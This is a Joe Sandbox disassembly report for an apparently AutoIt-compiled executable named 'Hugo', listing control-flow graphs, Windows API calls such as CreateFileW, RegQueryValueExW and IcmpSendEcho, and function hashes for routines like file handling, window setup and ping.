                                                                                                                                                                                                              control_flow_graph 366 f509db-f50a0b call f507af 369 f50a26-f50a32 call f45594 366->369 370 f50a0d-f50a18 call f3f636 366->370 375 f50a34-f50a49 call f3f636 call f3f649 369->375 376 f50a4b-f50a94 call f5071a 369->376 377 f50a1a-f50a21 call f3f649 370->377 375->377 385 f50a96-f50a9f 376->385 386 f50b01-f50b0a GetFileType 376->386 387 f50cfd-f50d03 377->387 391 f50ad6-f50afc GetLastError call f3f613 385->391 392 f50aa1-f50aa5 385->392 388 f50b53-f50b56 386->388 389 f50b0c-f50b3d GetLastError call f3f613 CloseHandle 386->389 394 f50b5f-f50b65 388->394 395 f50b58-f50b5d 388->395 389->377 403 f50b43-f50b4e call f3f649 389->403 391->377 392->391 396 f50aa7-f50ad4 call f5071a 392->396 399 f50b69-f50bb7 call f454dd 394->399 400 f50b67 394->400 395->399 396->386 396->391 409 f50bc7-f50beb call f504cd 399->409 410 f50bb9-f50bc5 call f5092b 399->410 400->399 403->377 416 f50bed 409->416 417 f50bfe-f50c41 409->417 410->409 415 f50bef-f50bf9 call f48a2e 410->415 415->387 416->415 419 f50c43-f50c47 417->419 420 f50c62-f50c70 417->420 419->420 422 f50c49-f50c5d 419->422 423 f50c76-f50c7a 420->423 424 f50cfb 420->424 422->420 423->424 425 f50c7c-f50caf CloseHandle call f5071a 423->425 424->387 428 f50cb1-f50cdd GetLastError call f3f613 call f456a6 425->428 429 f50ce3-f50cf7 425->429 428->429 429->424
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F5071A: CreateFileW.KERNEL32(00000000,00000000,?,00F50A84,?,?,00000000,?,00F50A84,00000000,0000000C), ref: 00F50737
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00F50AEF
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00F50AF6
                                                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 00F50B02
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00F50B0C
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00F50B15
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00F50B35
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00F50C7F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00F50CB1
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00F50CB8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                                                                                                                              • Opcode ID: a5afe3eeecdbb97efc381ea0c28a4e570727914dc870505b9f2964cb7502f13a
                                                                                                                                                                                                              • Instruction ID: 87bc9ed49e7423d075db94aac92366d24e1de8b11c50d978681b5b6f452c642e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5afe3eeecdbb97efc381ea0c28a4e570727914dc870505b9f2964cb7502f13a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93A12732E042489FDF19AF68DC92BAE3BA0EB46325F140159FD11DF291DB359C06EB91

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F15594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00F54B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00F155B2
                                                                                                                                                                                                                • Part of subcall function 00F15238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F1525A
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F153C4
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F54BFD
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F54C3E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00F54C80
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F54CE7
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F54CF6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                              • API String ID: 98802146-2727554177
                                                                                                                                                                                                              • Opcode ID: 57a227de1b5840036b678ecc2799afa101d9eec519fcf3de5a49da312f97ebc8
                                                                                                                                                                                                              • Instruction ID: b15a07c402411178d9fa003f84afc33c3c272b5ba870ea41f4852cb3ad4a9a7e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57a227de1b5840036b678ecc2799afa101d9eec519fcf3de5a49da312f97ebc8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B71AE715043459EC304EF65EC89DABBBE8FF88350F80442EF541CB1A1DB759A89EB62

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00F134DE
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00F134ED
                                                                                                                                                                                                              • LoadIconW.USER32(00000063), ref: 00F13503
                                                                                                                                                                                                              • LoadIconW.USER32(000000A4), ref: 00F13515
                                                                                                                                                                                                              • LoadIconW.USER32(000000A2), ref: 00F13527
                                                                                                                                                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F1353F
                                                                                                                                                                                                              • RegisterClassExW.USER32(?), ref: 00F13590
                                                                                                                                                                                                                • Part of subcall function 00F13624: GetSysColorBrush.USER32(0000000F), ref: 00F13657
                                                                                                                                                                                                                • Part of subcall function 00F13624: RegisterClassExW.USER32(00000030), ref: 00F13681
                                                                                                                                                                                                                • Part of subcall function 00F13624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F13692
                                                                                                                                                                                                                • Part of subcall function 00F13624: InitCommonControlsEx.COMCTL32(?), ref: 00F136AF
                                                                                                                                                                                                                • Part of subcall function 00F13624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F136BF
                                                                                                                                                                                                                • Part of subcall function 00F13624: LoadIconW.USER32(000000A9), ref: 00F136D5
                                                                                                                                                                                                                • Part of subcall function 00F13624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F136E4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                                                                                                                              • API String ID: 423443420-4155596026
                                                                                                                                                                                                              • Opcode ID: c2780817dc28e1cbbe8ea4f5e99da47421062b85c116709e1d3a5cc4dc0896fb
                                                                                                                                                                                                              • Instruction ID: 403601b9c285dbe69ed7722f131b51eb6766f89b8dfe2b2944d822a8b4577e88
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2780817dc28e1cbbe8ea4f5e99da47421062b85c116709e1d3a5cc4dc0896fb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 082153B0D4039CAFDB509F95EC95B997FB8FB08750F00001AF605AA260E7B90544EF90

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 507 f90fb8-f90fef call f1e6a0 510 f9100f-f91021 WSAStartup 507->510 511 f90ff1-f90ffe call f1c98d 507->511 513 f91023-f91031 510->513 514 f91054-f91091 call f2c1f6 call f18ec0 call f2f9d4 inet_addr gethostbyname 510->514 511->510 519 f91000-f9100b call f1c98d 511->519 516 f91033 513->516 517 f91036-f91046 513->517 530 f91093-f910a0 IcmpCreateFile 514->530 531 f910a2-f910b0 514->531 516->517 520 f91048 517->520 521 f9104b-f9104f 517->521 519->510 520->521 524 f91249-f91251 521->524 530->531 532 f910d3-f91100 call f3017b call f1423c 530->532 533 f910b2 531->533 534 f910b5-f910c5 531->534 543 f9112b-f91148 IcmpSendEcho 532->543 544 f91102-f91129 IcmpSendEcho 532->544 533->534 535 f910ca-f910ce 534->535 536 f910c7 534->536 538 f91240-f91244 call f1bd98 535->538 536->535 538->524 545 f9114c-f9114e 543->545 544->545 546 f911ae-f911bc 545->546 547 f91150-f91155 545->547 550 f911be 546->550 551 f911c1-f911c8 546->551 548 f911f8-f9120a call f1e6a0 547->548 549 f9115b-f91160 547->549 565 f9120c-f9120e 548->565 566 f91210 548->566 552 f911ca-f911d8 549->552 553 f91162-f91167 549->553 550->551 555 f911e4-f911ed 551->555 556 f911da 552->556 557 f911dd 552->557 553->546 560 f91169-f9116e 553->560 558 f911ef 555->558 559 f911f2-f911f6 555->559 556->557 557->555 558->559 562 f91212-f91229 IcmpCloseHandle WSACleanup 559->562 563 f91170-f91175 560->563 564 f91193-f911a1 560->564 562->538 570 f9122b-f9123d call f3013d call f30184 562->570 563->552 567 f91177-f91185 563->567 568 f911a3 564->568 569 f911a6-f911ac 564->569 565->562 566->562 571 f9118a-f91191 567->571 572 f91187 567->572 568->569 569->555 570->538 571->555 572->571
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAStartup.WS2_32(00000101,?), ref: 00F91019
                                                                                                                                                                                                              • inet_addr.WSOCK32(?), ref: 00F91079
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 00F91085
                                                                                                                                                                                                              • IcmpCreateFile.IPHLPAPI ref: 00F91093
                                                                                                                                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F91123
                                                                                                                                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F91142
                                                                                                                                                                                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 00F91216
                                                                                                                                                                                                              • WSACleanup.WSOCK32 ref: 00F9121C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                              • String ID: Ping
                                                                                                                                                                                                              • API String ID: 1028309954-2246546115
                                                                                                                                                                                                              • Opcode ID: 5c07e271cc092deb4b3295118e12ab78c53050355cf2f5ade310193685a58fcf
                                                                                                                                                                                                              • Instruction ID: 51344fd676ad851d56b798aa8392d2b4e1fd593452785ed8aba5660c72970e51
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c07e271cc092deb4b3295118e12ab78c53050355cf2f5ade310193685a58fcf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E91B471A04202AFEB20DF15C884F16BBE4FF45328F1485A9F5658B6A2C735ED85DB81

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 577 f1370f-f13724 578 f13784-f13786 577->578 579 f13726-f13729 577->579 578->579 582 f13788 578->582 580 f1372b-f13732 579->580 581 f1378a 579->581 583 f13804-f1380c PostQuitMessage 580->583 584 f13738-f1373d 580->584 586 f53df4-f53e1c call f12f92 call f2f23c 581->586 587 f13790-f13795 581->587 585 f1376f-f13777 DefWindowProcW 582->585 594 f137b8-f137ba 583->594 590 f13743-f13747 584->590 591 f53e61-f53e75 call f7c8f7 584->591 593 f1377d-f13783 585->593 623 f53e21-f53e28 586->623 588 f13797-f1379a 587->588 589 f137bc-f137e3 SetTimer RegisterWindowMessageW 587->589 595 f53d95-f53d98 588->595 596 f137a0-f137b3 KillTimer call f13907 call f159ff 588->596 589->594 597 f137e5-f137f0 CreatePopupMenu 589->597 598 f1374d-f13752 590->598 599 f1380e-f13818 call f2fcad 590->599 591->594 616 f53e7b 591->616 594->593 602 f53dd0-f53def MoveWindow 595->602 603 f53d9a-f53d9e 595->603 596->594 597->594 605 f53e46-f53e4d 598->605 606 f13758-f1375d 598->606 618 f1381d 599->618 602->594 610 f53da0-f53da3 603->610 611 f53dbf-f53dcb SetFocus 603->611 605->585 613 f53e53-f53e5c call f71423 605->613 614 f13763-f13769 606->614 615 f137f2-f13802 call f1381f 606->615 610->614 619 f53da9-f53dba call f12f92 610->619 611->594 613->585 614->585 614->623 615->594 616->585 618->594 619->594 623->585 627 f53e2e-f53e41 call f13907 call f1396b 623->627 627->585
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00F13709,?,?), ref: 00F13777
                                                                                                                                                                                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,00F13709,?,?), ref: 00F137A3
                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F137C6
                                                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00F13709,?,?), ref: 00F137D1
                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00F137E5
                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00F13806
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                              • String ID: TaskbarCreated
                                                                                                                                                                                                              • API String ID: 129472671-2362178303
                                                                                                                                                                                                              • Opcode ID: c544e6c0ec753ad281928c735dcbefaa307c34f59a85b82d403ca19e2a7c3130
                                                                                                                                                                                                              • Instruction ID: ae3d27d33bc18b4444e753603e3b3315f7fcdc89fd6fcf2f8f900f6cd7a7cb9b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c544e6c0ec753ad281928c735dcbefaa307c34f59a85b82d403ca19e2a7c3130
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1541FAF2508198BFEF185B2C9C8EBFD3A7DE701320F444125F502891D1DAA99BC8B762

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 633 f490c5-f490d5 634 f490d7-f490ea call f3f636 call f3f649 633->634 635 f490ef-f490f1 633->635 651 f49471 634->651 637 f490f7-f490fd 635->637 638 f49459-f49466 call f3f636 call f3f649 635->638 637->638 641 f49103-f4912e 637->641 657 f4946c call f42b5c 638->657 641->638 644 f49134-f4913d 641->644 647 f49157-f49159 644->647 648 f4913f-f49152 call f3f636 call f3f649 644->648 649 f49455-f49457 647->649 650 f4915f-f49163 647->650 648->657 656 f49474-f49479 649->656 650->649 655 f49169-f4916d 650->655 651->656 655->648 659 f4916f-f49186 655->659 657->651 662 f491a3-f491ac 659->662 663 f49188-f4918b 659->663 666 f491ae-f491c5 call f3f636 call f3f649 call f42b5c 662->666 667 f491ca-f491d4 662->667 664 f49195-f4919e 663->664 665 f4918d-f49193 663->665 670 f4923f-f49259 664->670 665->664 665->666 695 f4938c 666->695 668 f491d6-f491d8 667->668 669 f491db-f491dc call f43b93 667->669 668->669 677 f491e1-f491f9 call f42d38 * 2 669->677 672 f4932d-f49336 call f4fc1b 670->672 673 f4925f-f4926f 670->673 684 f49338-f4934a 672->684 685 f493a9 672->685 673->672 676 f49275-f49277 673->676 676->672 680 f4927d-f492a3 676->680 704 f49216-f4923c call f497a4 677->704 705 f491fb-f49211 call f3f649 call f3f636 677->705 680->672 687 f492a9-f492bc 680->687 684->685 689 f4934c-f4935b GetConsoleMode 684->689 693 f493ad-f493c5 ReadFile 685->693 687->672 691 f492be-f492c0 687->691 689->685 694 f4935d-f49361 689->694 691->672 696 f492c2-f492ed 691->696 698 f493c7-f493cd 693->698 699 f49421-f4942c GetLastError 693->699 694->693 701 f49363-f4937d ReadConsoleW 694->701 702 f4938f-f49399 call f42d38 695->702 696->672 703 f492ef-f49302 696->703 698->699 700 f493cf 698->700 706 f49445-f49448 699->706 707 f4942e-f49440 call f3f649 call f3f636 699->707 709 f493d2-f493e4 700->709 711 f4939e-f493a7 701->711 712 f4937f GetLastError 701->712 702->656 703->672 716 f49304-f49306 703->716 704->670 705->695 713 f49385-f4938b call f3f613 706->713 714 f4944e-f49450 706->714 707->695 709->702 719 f493e6-f493ea 709->719 711->709 712->713 713->695 714->702 716->672 723 f49308-f49328 716->723 726 f49403-f4940e 719->726 727 f493ec-f493fc call f48de1 719->727 723->672 732 f49410 call f48f31 726->732 733 f4941a-f4941f call f48c21 726->733 738 f493ff-f49401 727->738 739 f49415-f49418 732->739 733->739 738->702 739->738
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 6cb2be5a4ee160831402dd98be864b69c49876bc4ba6c6899dd5eb6b068fc24a
                                                                                                                                                                                                              • Instruction ID: 5ae0bb50365931147c335bb9c06a4a8fab4f196882d1c6ed21b82eda2a53dcaf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cb2be5a4ee160831402dd98be864b69c49876bc4ba6c6899dd5eb6b068fc24a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20C1E571E082499FDF11DFA8DC41BBE7FB4AF4A320F044155E914AB3A2C7B49941EB61

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 741 f2ac3e-f2b063 call f18ec0 call f2bc58 call f1e6a0 748 f68584-f68591 741->748 749 f2b069-f2b073 741->749 750 f68596-f685a5 748->750 751 f68593 748->751 752 f2b079-f2b07e 749->752 753 f6896b-f68979 749->753 754 f685a7 750->754 755 f685aa 750->755 751->750 758 f685b2-f685b4 752->758 759 f2b084-f2b090 call f2b5b6 752->759 756 f6897e 753->756 757 f6897b 753->757 754->755 755->758 760 f68985-f6898e 756->760 757->756 764 f685bd 758->764 759->764 766 f2b096-f2b0a3 call f1c98d 759->766 762 f68993 760->762 763 f68990 760->763 768 f6899c-f689eb call f1e6a0 call f2bbbe * 2 762->768 763->762 767 f685c7 764->767 772 f2b0ab-f2b0b4 766->772 773 f685cf-f685d2 767->773 801 f2b1e0-f2b1f5 768->801 802 f689f1-f68a03 call f2b5b6 768->802 775 f2b0b8-f2b0d6 call f34d98 772->775 776 f2b158-f2b16f 773->776 777 f685d8-f68600 call f34cd3 call f17ad5 773->777 795 f2b0e5 775->795 796 f2b0d8-f2b0e1 775->796 779 f68954-f68957 776->779 780 f2b175 776->780 811 f68602-f68606 777->811 812 f6862d-f68651 call f17b1a call f1bd98 777->812 784 f68a41-f68a79 call f1e6a0 call f2bbbe 779->784 785 f6895d-f68960 779->785 786 f688ff-f68920 call f1e6a0 780->786 787 f2b17b-f2b17e 780->787 784->801 837 f68a7f-f68a91 call f2b5b6 784->837 785->768 792 f68962-f68965 785->792 786->801 816 f68926-f68938 call f2b5b6 786->816 793 f2b184-f2b187 787->793 794 f68729-f68743 call f2bbbe 787->794 792->753 792->801 803 f686ca-f686e0 call f16c03 793->803 804 f2b18d-f2b190 793->804 833 f6888f-f688b5 call f1e6a0 794->833 834 f68749-f6874c 794->834 795->767 807 f2b0eb-f2b0fc 795->807 796->775 805 f2b0e3 796->805 818 f2b1fb-f2b20b call f1e6a0 801->818 819 f68ac9-f68acf 801->819 842 f68a05-f68a0d 802->842 843 f68a2f-f68a3c call f1c98d 802->843 803->801 840 f686e6-f686fc call f2b5b6 803->840 814 f68656-f68659 804->814 815 f2b196-f2b1b8 call f1e6a0 804->815 805->807 807->753 817 f2b102-f2b11c 807->817 811->812 824 f68608-f6862b call f1ad40 811->824 812->814 814->753 830 f6865f-f68674 call f16c03 814->830 815->801 859 f2b1ba-f2b1cc call f2b5b6 815->859 862 f68945 816->862 863 f6893a-f68943 call f1c98d 816->863 817->773 829 f2b122-f2b154 call f2bbbe call f1e6a0 817->829 819->772 822 f68ad5 819->822 822->753 824->811 824->812 829->776 830->801 880 f6867a-f68690 call f2b5b6 830->880 833->801 867 f688bb-f688cd call f2b5b6 833->867 835 f6874e-f68751 834->835 836 f687bf-f687de call f1e6a0 834->836 849 f68757-f68774 call f1e6a0 835->849 850 f68ada-f68ae8 835->850 836->801 887 f687e4-f687f6 call f2b5b6 836->887 883 f68ab5-f68abe call f1c98d 837->883 884 f68a93-f68a9b 837->884 888 f686fe-f6870b call f18ec0 840->888 889 f6870d-f68716 call f18ec0 840->889 857 f68a1e-f68a29 call f1b4b1 842->857 858 f68a0f-f68a13 842->858 895 f68ac2-f68ac4 843->895 849->801 898 f6877a-f6878c call f2b5b6 849->898 870 f68aed-f68afd 850->870 871 f68aea 850->871 857->843 906 f68b0b-f68b19 857->906 858->857 873 f68a15-f68a19 858->873 907 f2b1d2-f2b1de 859->907 908 f686ba-f686c3 call f1c98d 859->908 879 f68949-f6894f 862->879 863->879 913 f688de 867->913 914 f688cf-f688dc call f1c98d 867->914 890 f68b02-f68b06 870->890 891 f68aff 870->891 871->870 892 f68aa1-f68aa3 873->892 879->801 909 f68692-f6869b call f1c98d 880->909 910 f6869d-f686ab call f18ec0 880->910 883->895 899 f68a9d 884->899 900 f68aa8-f68ab3 call f1b4b1 884->900 887->801 929 f687fc-f68805 call f2b5b6 887->929 930 f68719-f68724 call f18577 888->930 889->930 890->818 891->890 892->801 895->801 933 f6878e-f6879d call f1c98d 898->933 934 f6879f 898->934 899->892 900->883 900->906 919 f68b1e-f68b21 906->919 920 f68b1b 906->920 907->801 908->803 940 f686ae-f686b5 909->940 910->940 928 f688e2-f688e9 913->928 914->928 919->760 920->919 936 f688f5 call f13907 928->936 937 f688eb-f688f0 call f1396b 928->937 951 f68807-f68816 call f1c98d 929->951 952 f68818 929->952 930->801 942 f687a3-f687ae call f39334 933->942 934->942 950 f688fa 936->950 937->801 940->801 942->753 956 f687b4-f687ba 942->956 950->801 955 f6881c-f6883f 951->955 952->955 958 f68841-f68848 955->958 959 f6884d-f68850 955->959 956->801 958->959 960 f68852-f6885b 959->960 961 f68860-f68863 959->961 960->961 962 f68865-f6886e 961->962 963 f68873-f68876 961->963 962->963 963->801 964 f6887c-f6888a 963->964 964->801
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                              • API String ID: 0-4285391669
